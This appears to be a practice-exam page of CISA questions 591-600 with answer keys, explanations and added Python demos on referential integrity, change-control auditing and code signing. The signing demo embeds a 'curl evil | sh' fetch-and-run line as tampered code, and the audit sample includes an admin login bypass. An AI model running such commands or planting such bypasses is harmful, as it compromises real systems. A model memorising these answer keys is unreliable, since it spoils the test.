Download New Updated (July) Isaca CISA Actual Test 591-600

Ensurepass

 

QUESTION 591

Which of the following would an IS auditor consider to be the MOST helpful when evaluating the effectiveness and adequacy of a computer preventive maintenance program?

 

A.

A system downtime log

B.

Vendors’ reliability figures

C.

Regularly scheduled maintenance log

D.

A written preventive maintenance schedule

 

Correct Answer: A

Explanation:

A system downtime log provides information regarding the effectiveness and adequacy of computer preventive maintenance programs.

 

 

QUESTION 592

Which of the following will prevent dangling tuples in a database?

 

A.

Cyclic integrity

B.

Domain integrity

C.

Relational integrity

D.

Referential integrity

 

Correct Answer: D

Explanation:

Referential integrity ensures that a foreign key in one table is either null or equal to the value of a primary key in the referenced table. For every tuple that carries a foreign key there must be a corresponding tuple in the referenced table; if this condition is not satisfied, the result is a dangling tuple (a row that points at a parent row that does not exist). Cyclical checking is a control technique for the regular checking of accumulated data on a file against authorized source documentation; there is no such thing as cyclical integrity testing. Domain integrity testing ensures that a data item has a legitimate value in the correct range or set. Relational integrity is performed at the record level and is ensured by calculating and verifying specific fields.
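The explanation above is easiest to see with a declared foreign key switched on and off. The following is an added example, not part of the original question bank: it uses SQLite from the Python standard library, with a constructed customer/orders schema, to show that an enforced foreign key rejects both an order for a nonexistent customer and the deletion of a still-referenced customer, that a NULL foreign key is allowed, and that with enforcement off the same operations silently create dangling tuples, which an auditor can then find with a LEFT JOIN query.

```python
"""Referential integrity versus dangling tuples, shown with SQLite (stdlib only).

Added illustration for the explanation above; the schema and rows are
constructed for this example and are not taken from the question.
"""
import sqlite3

SCHEMA = """
CREATE TABLE customer (
    customer_id INTEGER PRIMARY KEY,
    name        TEXT NOT NULL
);
CREATE TABLE orders (
    order_id    INTEGER PRIMARY KEY,
    customer_id INTEGER,                     -- foreign key; NULL is permitted
    amount      REAL NOT NULL,
    FOREIGN KEY (customer_id) REFERENCES customer(customer_id)
);
"""


def open_db(enforce_fk: bool) -> sqlite3.Connection:
    """Create an in-memory DB. SQLite enforces foreign keys only when the pragma
    is on, which mirrors a DBMS where referential integrity was never declared."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"PRAGMA foreign_keys = {'ON' if enforce_fk else 'OFF'}")
    conn.executescript(SCHEMA)
    conn.execute("INSERT INTO customer VALUES (1, 'Acme'), (2, 'Globex')")
    return conn


def insert_order(conn, order_id, customer_id, amount) -> bool:
    """True if the insert succeeded, False if the constraint rejected it."""
    try:
        conn.execute("INSERT INTO orders VALUES (?, ?, ?)",
                     (order_id, customer_id, amount))
        return True
    except sqlite3.IntegrityError:
        return False


def delete_customer(conn, customer_id) -> bool:
    """True if the delete succeeded, False if a child row still references it."""
    try:
        conn.execute("DELETE FROM customer WHERE customer_id = ?", (customer_id,))
        return True
    except sqlite3.IntegrityError:
        return False


def dangling_orders(conn) -> list:
    """Audit query: orders whose non-NULL customer_id matches no customer.
    A NULL foreign key is not dangling; referential integrity permits it."""
    rows = conn.execute("""
        SELECT o.order_id
        FROM orders o LEFT JOIN customer c ON o.customer_id = c.customer_id
        WHERE o.customer_id IS NOT NULL AND c.customer_id IS NULL
        ORDER BY o.order_id
    """).fetchall()
    return [r[0] for r in rows]


def demo(enforce_fk: bool) -> dict:
    conn = open_db(enforce_fk)
    results = {
        "valid_fk": insert_order(conn, 10, 1, 99.0),     # references customer 1
        "null_fk": insert_order(conn, 11, None, 5.0),    # NULL is allowed
        "missing_fk": insert_order(conn, 12, 99, 1.0),   # customer 99 does not exist
        "delete_referenced": delete_customer(conn, 1),   # customer 1 still has order 10
    }
    results["dangling"] = dangling_orders(conn)
    conn.close()
    return results


if __name__ == "__main__":
    print("FK enforced:    ", demo(True))
    print("FK not enforced:", demo(False))
```

With enforcement on, the two violating operations fail and the audit query returns nothing; with it off, both succeed and the audit query reports orders 10 and 12 as dangling. The audit query is the useful part for an IS auditor: it finds existing dangling tuples in a database where the constraint was never declared or was disabled for a bulk load.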

 

 

QUESTION 593

The PRIMARY objective of service-level management (SLM) is to:

 

A.

define, agree, record and manage the required levels of service.

B.

ensure that services are managed to deliver the highest achievable level of availability.

C.

keep the costs associated with any service at a minimum.

D.

monitor and report any legal noncompliance to business management.

 

Correct Answer: A

Explanation:

The objective of service-level management (SLM) is to negotiate, document and manage (i.e., provide and monitor) the services in the manner in which the customer requires those services. This does not necessarily ensure that services are delivered at the highest achievable level of availability (e.g., redundancy and clustering). Although maximizing availability might be necessary for some critical services, it cannot be applied as a general rule of thumb. SLM cannot ensure that costs for all services will be kept at a low or minimum level, since the costs associated with a service will directly reflect the customer’s requirements. Monitoring and reporting legal noncompliance is not a part of SLM.

 

QUESTION 594

When reviewing a hardware maintenance program, an IS auditor should assess whether:

 

A.

the schedule of all unplanned maintenance is maintained.

B.

it is in line with historical trends.

C.

it has been approved by the IS steering committee.

D.

the program is validated against vendor specifications.

 

Correct Answer: D

Explanation:

Though maintenance requirements vary based on complexity and performance workloads, a hardware maintenance schedule should be validated against the vendor-provided specifications. For business reasons, an organization may choose a more aggressive maintenance program than the vendor’s. The maintenance program should include the maintenance performance history, whether planned, unplanned, executed or exceptional. Unplanned maintenance cannot be scheduled. Hardware maintenance programs do not necessarily need to be in line with historical trends. Maintenance schedules normally are not approved by the steering committee.

 

 

QUESTION 595

Which of the following tests performed by an IS auditor would be the MOST effective in determining compliance with an organization’s change control procedures?

 

A.

Review software migration records and verify approvals.

B.

Identify changes that have occurred and verify approvals.

C.

Review change control documentation and verify approvals.

D.

Ensure that only appropriate staff can migrate changes into production.

 

Correct Answer: B

Explanation:

The most effective method is to determine through code comparisons what changes have been made and then verify that they have been approved. Change control records and software migration records may not have all changes listed. Ensuring that only appropriate staff can migrate changes into production is a key control process, but in itself does not verify compliance.
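The test described above starts from the code rather than from the change records. As an added example, not part of the original question bank, the following Python fingerprints a baseline and the current production tree with SHA-256, derives the set of changes by comparison, and then checks each change against approved tickets. The file contents, paths and the ticket structure (id, status, files) are all constructed for the illustration and do not correspond to any real change-management system.

```python
"""Change-control compliance test: derive the changes from the code itself,
then check each one against the approval records.

Added illustration for the explanation above. All manifests, file contents and
change tickets below are constructed for this example; the ticket format is a
hypothetical one, not any real change-management system's.
"""
import hashlib


def fingerprint(files: dict) -> dict:
    """Map path -> SHA-256 of content; this is the 'code comparison' baseline."""
    return {path: hashlib.sha256(data).hexdigest() for path, data in files.items()}


def diff_manifests(baseline: dict, current: dict) -> dict:
    """Classify every path as added, removed or modified by comparing hashes."""
    changes = {}
    for path in baseline.keys() | current.keys():
        if path not in current:
            changes[path] = "removed"
        elif path not in baseline:
            changes[path] = "added"
        elif baseline[path] != current[path]:
            changes[path] = "modified"
    return changes


def unapproved_changes(changes: dict, tickets: list) -> dict:
    """Return the changes for which no approved ticket names the path.
    Tickets that are not in 'approved' status do not count; tickets that name
    files which never changed are a separate finding and are ignored here."""
    covered = set()
    for ticket in tickets:
        if ticket["status"] == "approved":
            covered.update(ticket["files"])
    return {p: kind for p, kind in changes.items() if p not in covered}


# --- constructed sample data -------------------------------------------------
BASELINE_FILES = {
    "app/auth.py":   b"def login(u, p):\n    return check(u, p)\n",
    "app/report.py": b"def run():\n    return query()\n",
    "app/legacy.py": b"# old module\n",
}
PRODUCTION_FILES = {
    # auth.py was edited without an approved ticket (an extra bypass clause)
    "app/auth.py":   b"def login(u, p):\n    return check(u, p) or u == 'admin'\n",
    "app/report.py": b"def run():\n    return query(limit=100)\n",
    "app/export.py": b"def export():\n    pass\n",   # new file, no ticket at all
}
TICKETS = [
    {"id": "CHG-101", "status": "approved", "files": ["app/report.py"]},
    {"id": "CHG-102", "status": "approved", "files": ["app/legacy.py"]},
    {"id": "CHG-103", "status": "pending",  "files": ["app/auth.py"]},
]


def audit() -> dict:
    changes = diff_manifests(fingerprint(BASELINE_FILES), fingerprint(PRODUCTION_FILES))
    return unapproved_changes(changes, TICKETS)


if __name__ == "__main__":
    for path, kind in sorted(audit().items()):
        print(f"UNAPPROVED {kind:<8} {path}")
```

Against this data the audit reports two exceptions: app/auth.py was modified under a ticket that is still pending, and app/export.py was added with no ticket at all. Neither would be visible from a review of the migration records alone if the person who made the change never raised one. In practice the baseline hashes come from the last audited release, a signed build manifest or a file-integrity monitoring tool.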

 

 

QUESTION 596

Which of the following network components is PRIMARILY set up to serve as a security measure by preventing unauthorized traffic between different segments of the network?

 

A.

Firewalls

B.

Routers

C.

Layer 2 switches

D.

VLANs

 

Correct Answer: A

Explanation:

Firewall systems are the primary tool that enables an organization to prevent unauthorized traffic between networks; an organization may deploy one or more systems that function as firewalls. Routers can filter packets on parameters such as source address (access control lists), but their primary function is forwarding, not security. Layer 2 switches forward frames by Media Access Control (MAC) address and so isolate traffic per port, but they do not determine whether that traffic is authorized. A virtual LAN (VLAN) is a feature of some switches that groups ports into a separate broadcast domain as if they were on their own LAN; VLANs segment the network but do not themselves distinguish authorized from unauthorized traffic, and traffic between VLANs still has to pass through a router or firewall for any policy to be enforced.

 

 

QUESTION 597

Which of the following would be an indicator of the effectiveness of a computer security incident response team?

 

A.

Financial impact per security incident

B.

Number of security vulnerabilities that were patched

C.

Percentage of business applications that are being protected

D.

Number of successful penetration tests

 

Correct Answer: A

Explanation:

The most meaningful indicator of a response team’s effectiveness is the financial impact per security incident, because prompt containment and recovery reduce the loss caused by each incident. Choices B, C and D could be measures of the effectiveness of the security program as a whole, but none of them measures how well the response team performs.

 

 

QUESTION 598

During the requirements definition phase for a database application, performance is listed as a top priority. To access the DBMS files, which of the following technologies should be recommended for optimal I/O performance?

 

A.

Storage area network (SAN)

B.

Network Attached Storage (NAS)

C.

Network file system (NFS v2)

D.

Common Internet File System (CIFS)

 

Correct Answer: A

Explanation:

In a SAN, made up of host computers, Fibre Channel (FC) switches or routers and storage devices, no computer hosts and exports a mounted file system for remote access (apart from special-purpose SAN file systems). Access to data on SAN storage is comparable to direct-attached storage: the volumes are presented to the host as local block devices, so each block on disk can be addressed directly, which gives the best I/O performance. The other options are file-level protocols in which a server or appliance shares its file system with other systems; every read and write then passes through the file-sharing protocol, the network and the serving host’s file system, adding latency and overhead that a database engine doing heavy random I/O will notice.

 

 

QUESTION 599

An organization provides information to its supply chain partners and customers through an extranet infrastructure. Which of the following should be the GREATEST concern to an IS auditor reviewing the firewall security architecture?

 

A.

A Secure Sockets Layer (SSL) has been implemented for user authentication and remote administration of the firewall.

B.

Firewall policies are updated on the basis of changing requirements.

C.

Inbound traffic is blocked unless the traffic type and connections have been specifically permitted.

D.

The firewall is placed on top of the commercial operating system with all installation options.

 

Correct Answer: D

Explanation:

The greatest concern when a firewall runs on top of a commercial operating system is that vulnerabilities in that operating system can undermine the security of the firewall platform itself; in most cases where commercial firewalls are breached, the breach is facilitated by a weakness in the underlying OS. Installing with all options leaves unnecessary services, libraries and tools on the firewall host and widens the attack surface further; the platform should be installed minimally and hardened. Using SSL (today TLS) to protect user authentication and remote administration of the firewall (choice A) is good practice. Because the roles and profiles of users and supply chain partners change frequently, updating firewall policies as requirements change (choice B) is expected, and blocking all inbound traffic unless the traffic type and connection have been specifically permitted (choice C) is prudent default-deny practice.

 

 

QUESTION 600

The purpose of code signing is to provide assurance that:

 

A.

the software has not been subsequently modified.

B.

the application can safely interface with another signed application.

C.

the signer of the application is trusted.

D.

the private key of the signer has not been compromised.

 

Correct Answer: A

Explanation:

A valid code signature proves only that the executable code is byte-for-byte what the holder of the signing private key signed, so any modification after signing will be detected. It does not establish that the signer is trustworthy (trust in the signing key has to come from outside the signature, e.g., a trusted certificate chain or a pinned key), that the private key has not been stolen or misused, or that the application is safe to combine with other signed software. Each of those assumptions is a weakness an attacker can exploit: malware signed with the attacker’s own key, or with a compromised publisher key, verifies successfully.
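The four answer choices can be demonstrated directly. The following is an added example and not part of the original question bank: it implements a textbook RSA signature over a SHA-256 digest (keys generated at run time with a Miller-Rabin prime search, no padding, so a teaching toy rather than a production scheme) and runs four scenarios. The "publisher" and "attacker" identities and the sample script bytes are invented for the illustration. A modified binary fails verification (choice A holds), while the attacker's self-signed malware and malware signed with a stolen publisher key both verify perfectly, which is why choices C and D are not something the signature can promise.

```python
"""What a code signature does and does not prove.

Added illustration for the explanation above. Textbook RSA over SHA-256 with
run-time generated keys and no padding; a teaching toy, not a production
signing scheme. Publisher, attacker and the script bytes are constructed.
"""
import hashlib
import random


def _is_probable_prime(n: int, rounds: int = 32) -> bool:
    """Miller-Rabin probabilistic primality test."""
    if n < 4:
        return n in (2, 3)
    if n % 2 == 0:
        return False
    d, r = n - 1, 0
    while d % 2 == 0:
        d //= 2
        r += 1
    for _ in range(rounds):
        a = random.randrange(2, n - 1)
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _random_prime(bits: int) -> int:
    while True:
        cand = random.getrandbits(bits) | (1 << (bits - 1)) | 1  # full size, odd
        if _is_probable_prime(cand):
            return cand


def generate_keypair(bits: int = 256) -> tuple:
    """Return ((n, e), (n, d)). 256-bit primes keep the demo fast; real keys are
    far larger. n must exceed the 256-bit digest, which a 512-bit n does."""
    e = 65537
    while True:
        p, q = _random_prime(bits), _random_prime(bits)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e != 0:
            break
    d = pow(e, -1, phi)
    return (p * q, e), (p * q, d)


def sign(code: bytes, private_key: tuple) -> int:
    n, d = private_key
    digest = int.from_bytes(hashlib.sha256(code).digest(), "big")
    return pow(digest, d, n)


def verify(code: bytes, signature: int, public_key: tuple) -> bool:
    """True iff the signature was produced over exactly these bytes by the holder
    of the private key matching public_key. It asserts nothing else."""
    n, e = public_key
    digest = int.from_bytes(hashlib.sha256(code).digest(), "big")
    return pow(signature, e, n) == digest


def scenarios() -> dict:
    pub_pub, pub_priv = generate_keypair()   # legitimate publisher's key pair
    att_pub, att_priv = generate_keypair()   # attacker's own key pair
    code = b"print('hello')\n"
    sig = sign(code, pub_priv)
    tampered = code + b"import os; os.system('curl evil | sh')\n"  # edited after signing
    return {
        # Choice A: modification after signing is detected
        "genuine_verifies": verify(code, sig, pub_pub),
        "tampered_fails": verify(tampered, sig, pub_pub),
        # Choice C: a valid signature says nothing about whether the signer is
        # trusted; the attacker's malware verifies against the attacker's key
        "attacker_self_signed": verify(tampered, sign(tampered, att_priv), att_pub),
        # Choice D: with the publisher's stolen private key, malware verifies
        # against the publisher's genuine public key
        "stolen_key_signature": verify(tampered, sign(tampered, pub_priv), pub_pub),
    }


if __name__ == "__main__":
    for name, ok in scenarios().items():
        print(f"{name:<22} verify() -> {ok}")
```

Only the second scenario returns False. Deciding whether att_pub should be trusted at all, and detecting that pub_priv has leaked, are jobs for the surrounding PKI (certificate chains, key pinning, revocation and transparency logs), not for the signature check itself.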
